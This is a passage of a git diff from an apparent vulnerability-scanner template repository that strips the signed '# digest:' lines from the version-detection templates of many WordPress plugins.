4b0a00483046022100e2875570753c60f6a0f2b1b733cc3e8c4b7786454b6041c1efbf15994f97180b022100c74ff866e1f54782f693721384ed8e27a0016f307f3e69af432a373b518c6680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index a23088bd816..3fe86debf56 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cfbca309ca3ead79620290dc4076619dadbdcc1edb0b9f928086faaad84f60f502205fa2fbb948fc13d9db8b6c6d63cb4053b3d291323dd5bedf6d08b390d18f9b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 1f05aaa4efc..18a7437e94b 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203127969a8b5499f56bb733bdd0920c3d79d8339b2ae3c4589a025f35ce3ad5af02202c044d0c80268f22398acdfd92532b5c324c080ad1a687a926305e3c2300b9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 84c3b5da11c..3deac58709d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220447d0556ac39135757b1446a0e5563ae89cf57d57950e1b92abbf7e76e8fdd15022038f47bd4d79b5e32704325cb0acc022d4316ef484dbe1e423ce3000a95f2e264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9a934675499..e7e7c276825 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009edd0156c5cc8b5b678699334e1957281658dd849db3b786dcbea34e851d87ef0221008fe8e53ce2b0240810d04fbadc644d04d55e3d71d73fb0a8e8f306d3bce20c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 3e97323b198..ad4ebefa4b1 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae41d8479a77bc646b7b723b038589f1f10d7166ec4d14a867b1b106d01ef03602210099fc656ee0d7909ad4893e1bb4757d7e13d0c664a970013ac1d8ca39bf760650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 43d263fc8df..8e88c81c0a9 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e18685816c6012c4f10e38ebacda9bb15922135acd00d6bcd07025565fdcc5e6022100d5f690d44aa4aae3128117be4e6f3e23ac8789e44b98ee5781c628018e6e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index d757b72dc01..39d269fb856 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220780d62ddfd7598d22221567ab7b795b86ed19405bccaa529b2f8c4ab528c9ed80221009862677dedffe28ccf8c7bc6eec23a4d07b0efbc04aadb76850d70cd16d4e459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 141e501dbc0..fc126d83c63 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa0ed357a683b5445b0d5b9d9222ff3dcd06aa2a7fd976ccd8b6c1bbba596aab022067367a8e52812e8f8ae9d95686507344c4f6cdbad2b6c04e2b29a1d72468dbdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index c02ce33b98c..8c49a342590 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207fd4bc920c77930f54ebfa9c3e797239ce279501c134d8cdcc56b85c1d880ec60220701afa4523cfe387efe54bd67215e97d2d886566820f4fd8ef55cfe3f49636d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index bf6a35e3493..6ac2212b4be 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e362f0e91fcbc3a63c628b4f0d3bd24c9aa4866f41e40f0628738bd316a96d702205b0c8277424c3efeb8288cd8da0116756970d5d554ee831c039a5c59e3b774e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 055daeb94bc..71c71b5ed14 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203516c1d8aa0db0f02b6abe7c96a110dc1214b33581aeb2ace32d65c5bbc1b6fe0221008f44361b4c10773311522681f62d208e24b2c880f2ed47b44e6ab1799f3cd74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index a7c6b3dd8f7..7b47adc274b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207082f801483226470e10b54e66c05254fad0251dee96484f2cdd403e53759500022100b1ca3dc47d89cc547f925f64696d21f472e49f28d67b62541763f6b408632a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index e51ebf47065..286dfdaec66 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbd3ba1b0ab93948325bfe1665e6a7f1300d67c9078eb6153227cf827e9cf2ef02200e9686a7327a4af0948a9abdb888a855c82babfaa9ca76e71993cad86c9f7a73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 23751d61125..c4928059f6c 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abfc25744401a03dcb216b50d84fa546e88207237db0a3c2cbae9ef45a198197022100ef5ffc2a613627626d535cae1edcce251040e938e175f1b1710de0c5a3d952c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index ef3f7823a35..f6a7836f35a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d055b7bfd5584008f0bab3a3b863430d109fcf855fd0660bd99ed087c3bfc29302206cb192af79e9fc49fb40057128f910005d122473f170a2ab5a927fe683b4f906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 4d0202eb1b0..b7af708c4fa 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b488e09c22e61758d7740fb01e6e6b27646b2c52942082bf5ccd64fb58932c402207adafbbfab96f3b28a66d76092a1f9c74bf5550e6b06388e63347166ee77b832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index fd7807f0c47..61a793edf72 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb0b374d28497dbaacc5d1e60398d2f1265f7a36d8cbf579321acd22879b95640220741184e075f30a4aeb13e4b0bf7b7aa9932012aac1a18c4b30bf2b6fa795ad01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index e9166fcb94b..0da88d5d3f7 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b62daf113fecc88ec6b76fe0f2343d3980aff4ae1770d7cd9040bfa5ce6383d02203c46de2caf63278a99f422d9a312308ac349a9419656067024666a4f062e96f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index e188bb085b4..2b29428cf10 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220423796077f7866de15930bc25e35d1834c1675ac72da75894d677cbb7b5fca200220489884313d24e308bc766789d48a99f37ebe274d620437ce2802b5e58498a9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 84cfdb92ddc..181e619a7cf 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8839424132ce73202c4affcb8b99417c1f94e2db2b2bcd3b3a286fbf2bbab8d022100cbf5de1e09c26cb7646be16dabcb53de5c948d1276b428a64dfe27cad948638a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e321fb10b43..8164eb44838 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b308a2277ad053a9035a75ca030560f0ef03a5b42dede95175296a62f299e13022100d9bbac803d35edaf741236a6bb90a8963c47abb2b3c7c6b243e7ae8b1acb6512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 35e40bcea93..59554defdfc 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070fc4a3fe1c0bcd75884572d206af0cd43ba1fd6f35e0501990cc72a6ce329b202201e7c141521a021dcddf900833fd27364ecb2a778268f5d9067aa66a2c82705ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 790ff3accd6..350fd9436b4 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a7eac103e54a33bf3619af408d7a10ee506061eb51adc4f03e1e4fceb573b39022100d4b8137885e62ef4d249f61aec975509fba4ab77889a6efcbba11a4326dca921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 29db49d18de..2ae6bafbbab 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfb836965e834b46893949a85458f323719d837d4139ac2858898036ead0bd5502207777240409d5660a9d2b26c6e398e8f353db5031fef7d5c69db0c9a98c580b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index a620aa5f184..d0dc8d92bb9 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043425dd78623cb573da34e092416d9c4283e9b619d1ea3cead77ac5969a9e3fb02202befb2757621c303d994322afbfc7577c92a09247e1c371c54bf69c6478602d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 13e3400a319..c49bbc2b6d1 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0fc439af9d1a762bcb24b875f2f0cc6e22ff0b4bca456eb5690711d85d8ab80022100e0202d1a2ae41d6d09d4561bb73eba3c6b134b851a51addd169384db08a4c698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 84eea515e65..27586cbd9d1 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bb0f8d6009d9a1a4d4401be25b52c6516893c33f39eb4d768dddd78f53bb8e9022100e79d0eec39ab6623bfb620a030c255d0d5c2fbe0accd554598d8b55e44fa1667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a962d1376bb..946272f0a90 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5f7d6165b9ece57399498e3e3472d8613899288ad2e64adb0c83c62f3f2d001022022355530e7a2b6354975a1b0c663bd5156751c007eb003c9e6a00924bba27f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 809be488f59..aa297068720 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8f9e0a0fadd9ac46889390227292ba02ecbe597d53d18fa1f88397a608784e7022005c43050efe0b78888a2d413233700a7a5778b4cffc5fb374c905cfc28c4cffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index da6f3d60162..290d53ab7ed 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9fb7ab29c61e5cb2354eac4b81bbabba383092edaa9cdf77591ece9ea79027502204d67328f8b4aff73025e236f96e9008d314eae61ffdf21d9aab00e6646b5ea0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 7a36d13dc83..f7c9ef9b1f8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009f96691efd9ba09ddac8893710c814ad4a309d56834bf17824de0ac2560eecf02206d1377ca9adbb59c3bb7fbf89010383aaa11eec13e2ad361636f2b86ea63fea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1cc92e36509..f1c16275a2a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0239541ac0137c196fdc654a61bac659cc876ebf7e8181f78860e9220bfba5702203d5e832380d5113e52c1a530a79b87e14eba9d4629b1c1410dcf35210526d587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 267453218f3..fc072e19d8a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200775db4789159e050f4434b5047bb108e74c4bf0472b2a05506e5eb4a315f58c0220283f2ec5d3193e9d8eeceff0a996c9e1acd23cb80288e9388e0e160b8cc1c9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 53d0e74b25b..da9df0e8a5c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b1ec5e917af72b70d1afc1574b82b8c2eba9df7968a3de5ca24c056d316504e02201bf9691f97eab6aa86a620978063e49946fd06567cabef4759e3224ec2bf42f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 382137fe1bf..f8113d97506 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035f673700620b877594f83a98cf06ab95cb43b5b096abe831d7f8888e5e32a14022045e6b16f6b28066683115ddfa624be6684e831b308736ad3d96c1b53de0cd28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 09730ce402d..5f80282ab22 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220201e138c1ec5581e4e6cb5899349f56b89b33f34ebdfa1f4f9a3ca56e5351c2202204d8ade600699c59892843da9213440c03adf408dba81b663ddc2ce1594a0b2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 2585b241add..5725d5bb3f8 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031c2612d9d6f39f0396e0f87d1c39f54d1205fac1b40bed212e2ab67a56c60a6022014f60a00055a63539d24006e167fce59b8c7dbc13dc1d6419c8bd3f8945397fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7b1fe387308..f67a8bc18a8 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059f4fdd0dab55b96f018d54d81596e4afde228dda1f0e85652b4dc4cf8ef2fbe022030ac9ed6d1ff46014141b58f3d585d951689598b5128372a5642b7b29fdf115b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index c6af7d4e38c..a773829b7d8 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d236eb5968ddb506715903d4b9446f7275497719638170309f240736403a84302210086ee6a588f9d5c50b8d861c63e68f53ef3ce0bc8d89daaa55667305c3de8c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index e9527fa0e9d..b9bd4be0a8b 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e90dffa5327c6fe3c76a1183fc072a166e228776ae10fc6262114956bedf0b002203be51f76d27001c3745b6de40a137760c5d002555f2d06e61717db41ae74bf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f2d4ed95fb4..bece4ce486a 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8df321ad63d2980483c02c1f226775f57df79850db23d117241f84f6d72d515022100f8b609bf335a06e509df815107fe83bc9f216c76e38285356a591f0cabde7abb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 39d352d9445..138b0aa9a69 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077553fc0f35cf4f36a1000de9f965b794d0d9b55c2d9be092eb057b91032b53a022100d681962a31b99d847851016e5f25eb96e484867f5cef6c9a1e49e07f42b6459c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index b81fa316da9..68bf71bc839 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c68aefd3801c9b9cd191c31d933bf9511643aa894807231324d345563139f9f102205e35a9b263bdf20d7dc5fa367f34548d440498b1018a30d7138da5400a52b87d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index e3b22679755..10dad2d2fb8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205932a7a3f6c6f323187328623b108111b70fd2340e997443d130344658b343d90221008202278d6d42219dbc9d57e6adc1bb9d9451a7d3d780434e955f6a6ceca214a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e756a579388..e9efe6fb53a 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206623540bbcbc63e5cb996efd004adfeeff127c75195aeb646141aeadd18a06ac02202f471bdd75f19d2a0bd04c3b8704211ac4355ce50b3daf9c78a1c9dcb6eecb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 0fed5799a93..c3d10f01359 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c4092f6cfc305aeb53730d9e9a25dd6df135d7f913ccf74c05eb7535398e92c002204bd652e5ac62fc0d3023a81093599add81d14f53c3a1c97b7711a8bfec3cfef4:922c64590222798bb761d5b6d8e72950 \ No newline at end 